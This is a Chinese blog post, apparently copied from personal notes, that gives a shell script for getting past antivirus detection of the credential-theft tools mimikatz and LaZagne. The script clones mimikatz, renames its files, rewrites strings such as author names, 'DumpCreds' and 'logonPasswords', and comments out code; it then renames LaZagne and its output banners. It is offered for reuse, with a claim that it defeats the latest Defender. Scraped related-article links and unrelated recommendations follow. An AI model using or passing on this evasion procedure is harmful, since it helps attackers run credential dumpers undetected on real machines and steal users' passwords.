其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过

文章直接从笔记复制出来的,有需要的自己看情况用

git clone https://github.com/gentilkiwi/mimikatz.git lmmg

mv lmmg/mimikatz lmmg/lmmg

find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";

        mv "${FILE}" "${newfile}";

done

find lmmg/ -type f -name '*kiwi*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";

        mv "${FILE}" "${newfile}";

done

find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'

find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 

cd ./lmmg/lmmg/

sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c

sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c

lazagne

find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";

        mv "${FILE}" "${newfile}";

done

find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";

        mv "${FILE}" "${newfile}";

done

find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";

        mv "${FILE}" "${newfile}";

done

find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";

        mv "${FILE}" "${newfile}";

done

find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";

        mv "${FILE}" "${newfile}";

done

find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do

        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";

        mv "${FILE}" "${newfile}";

done

find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'

find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'

find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g'

find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'

find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'

find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'

find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'

find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'

find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'

关于mimikatz lazagne免杀方法的更多相关文章

  1. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

  2. lcx源代码以及免杀的研究

    之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用 ...

  3. 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践

    实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...

  4. 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践

    一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...

  5. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  6. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  7. 2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践 一.实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5 ...

  8. NetSec2019 20165327 Exp3 免杀原理与实践

    NetSec2019 20165327 Exp3 免杀原理与实践 pre基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清 ...

  9. 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践

    免杀原理与实践 目录 知识点问答 实践内容 遇到的问题 心得体会 知识点 meterpreter免杀 基础问题回答 杀软是如何检测出恶意代码的? 特征码(基于签名):模式匹配,比对特征码库 启发式:通 ...

随机推荐

  1. 2019年最新超级有趣好玩的html+css网页布局课程,前端入门基础,html5+css3零基础入门课程-黑马程序员pink老师精心录制

    大家好,我是黑马程序员pink老师!! 本次视频是前端零基础入门的课程,pink老师采取有趣好玩讲法,带你快乐的学习枯燥的html+css知识,学完之后让你能快速布局pc端页面.代码也可以讲的好玩有趣 ...

  2. httpSession和Cookie

    1.session在何时被创建一个常见的误解是以为session在有客户端访问时就被创建,然而事实是直到某server端程序调用 HttpServletRequest.getSession(true) ...

  3. xamarin开发的mac开发小工具集合

    兄弟们我拖控件拖到了mac系统去了, 工具上传到百度网盘,下载地址 链接:https://pan.baidu.com/s/1Q64zoRjE3u66jJnzF8rhww提取码:ljx2 这款工具我是用 ...

  4. 人生,还没困难到"非死不可"

    最近半个月,美国著名的Facebook公司,出了好几件大事.第一件事,2019年9月19日,一名陈姓中国软件工程师在Facebook加州总部跳楼自杀.第二件事,2019年10月4日,一名软件工程师在座 ...

  5. Executor线程池原理详解

    线程池 线程池的目的就是减少多线程创建的开销,减少资源的消耗,让系统更加的稳定.在web开发中,服务器会为了一个请求分配一个线程来处理,如果每次请求都创建一个线程,请求结束就销毁这个线程.那么在高并发 ...

  6. Head First设计模式——观察者模式

    1.气象监测应用,错误示范 有一个气象站,分别有三个装置:温度感应装置,湿度感应装置,气压感应装置.WeathData对象跟踪气象站数据,WeathData有MeasurmentsChanged()方 ...

  7. CentOS 7.6 Telnet服务搭建(Openssh升级之战 第一任务备用运输线搭建)

    (以下内容亲手完成,如果需要搬走记得把写博的小白的名字和邮箱一起搬走) 出来玩(学习),总是要还的! 有不明的问题的时候,都来博客园转转,总能找到答案或者灵感,开博3个月都没发一篇帖(不晓得管理员有何 ...

  8. Python3之多线程学习

    这里做一个自己复习多线程的笔记 Python中使用线程有两种方式:函数或者用类来包装线程对象. 函数式:调用 _thread 模块中的start_new_thread()函数来产生新线程.语法如下: ...

  9. [模板]二维ST表

    考试yy二维ST表失败导致爆零. 其实和一维的ST表很像... 也是设$f[i][j][p][q]$为以$(i, j)$为左上角,长为$2^p$,宽为$2^q$的矩形的最大值. 算法流程是先把每一行都 ...

  10. [Luogu2422]良好的感觉

    题目描述 kkk做了一个人体感觉分析器.每一天,人都有一个感受值Ai,Ai越大,表示人感觉越舒适.在一段时间[i, j]内,人的舒适程度定义为[i, j]中最不舒服的那一天的感受值 * [i, j]中 ...